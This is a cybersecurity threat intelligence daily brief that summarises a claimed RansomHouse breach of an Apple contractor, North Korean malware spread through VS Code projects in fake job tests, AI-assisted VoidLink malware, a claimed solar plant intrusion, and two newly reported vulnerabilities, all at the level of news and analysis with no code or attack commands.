ZeroFox Daily Intelligence Brief - January 21, 2026

ZeroFox Daily Intelligence Brief - January 21, 2026

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.

Brief Highlights

• RansomHouse Claims Breach Tied to Apple and Nvidia Contractor
• North Korean Threat Actors Deploying Malware via Malicious VS Code Projects
• Newly Discovered VoidLink Malware Reportedly Generated Using AI

RansomHouse Claims Breach Tied to Apple and Nvidia Contractor

Source: https://hackread.com/ransomhouse-data-breach-apple-contractor-luxshare/

What we know: Ransomware and extortion group RansomHouse has claimed to have leaked files associated with Apple via a breach at its Chinese manufacturing partner Luxshare Precision Industry. The group also claimed that data belonging to NVIDIA, Meta, and Qualcomm, among others, have also been breached.

Context: RansomHouse first claimed Luxshare as a victim on January 9, 2025. On January 20, ZeroFox observed that the post was updated with two onion download links as samples. RansomHouse is suspected to be an offshoot of Babuk ransomware group, with alleged links to Russia and Eastern Europe.

Analyst note: The veracity of RansomHouse’s claims cannot be ascertained until either the targeted entity confirms the breach or sample data is verified. However, If these claims are verified, they would very likely have far-reaching consequences, even national security implications for multiple countries, since the breach involves chip manufacturers like Nvidia and Qualcomm.

North Korean Threat Actors Deploying Malware via Malicious VS Code Projects

Source: https://thehackernews.com/2026/01/north-korea-linked-hackers-target.html

What we know: North Korean threat actors are reportedly using malicious Visual Studio Code (VS Code) projects as part of fake job assessments to deliver a backdoor with remote code execution (RCE) capabilities on the target system.

Context: Victims are instructed to duplicate repositories on GitHub, GitLab, or Bitbucket and launch them in VS Code. Then, threat actors abuse VS Code task configuration files to deploy BeaverTail and InvisibleFerret malware strains. This latest tactic is part of a long-operating campaign, called Contagious Interview, which weaponizes the job application process.

Analyst note: Software engineers working in fintech sectors are being increasingly targeted by North Korean threat actors, which is likely to give them access to financial assets, proprietary source code, and internal systems of fintech firms. Compromised systems are very likely to result in financial and intellectual property theft.

Newly Discovered VoidLink Malware Reportedly Generated Using AI

Source: https://www.bleepingcomputer.com/news/security/voidlink-cloud-malware-shows-clear-signs-of-being-ai-generated/

What we know: VoidLink, a newly discovered malware framework, was reportedly developed with the help of a legitimate AI coding assistant, called TRAE SOLO. Researchers found that this malware strain was developed by a single threat actor and was rapidly functional within one week.

Context: VoidLink is a cloud-native Linux malware framework, featuring 37 malicious plugins, custom loaders, implants, and rootkit capabilities. At the time of writing, there have been no confirmed active infections.

Analyst note: VoidLink’s discovery likely suggests that fully functional malware can now be developed successfully with the assistance of legitimate AI tools, without requiring traditional manpower. VoidLink’s AI-assisted development is likely to encourage other threat actors to build their own malware using AI, enhancing their capabilities and accelerating the proliferation of malware strains for both mass-scale and customized attacks.

DEEP AND DARK WEB INTELLIGENCE

Telegram user Infrastructure Destruction Squad: Threat group Infrastructure Destruction Squad (IDS) claims it has breached the control system of a solar power plant in Italy. IDS alleges access to the plant’s Solar Tracker Control System, which manages and monitors its solar arrays within a live operational environment. If the actor's claims are true, the plant's controls are likely to be targeted and manipulated to reduce energy output, force shutdowns, or cause intermittent outages.

VULNERABILITY AND EXPLOIT INTELLIGENCE

CVE-2026-22219: CVE-2026-22219 is a server-side request forgery (SSRF) issue, which when exploited can expose cloud credentials and enable lateral movement within cloud infrastructure. Threat actors are likely to target affected devices to steal sensitive user and proprietary data.

Affected products: Chainlit versions 0 to 2.9.4

Cloudflare vulnerability: Cloudflare fixed a flaw in its ACME HTTP-01 validation logic that could enable attackers to bypass security controls and reach customer origin servers. The issue reportedly stemmed from how edge requests to a directory were handled. Threat actors are likely to exploit unpatched versions to bypass Cloudflare protections, accessing origin servers, to conduct reconnaissance and establish persistence.

Affected products: Cloudflare’s Automatic Certificate Management Environment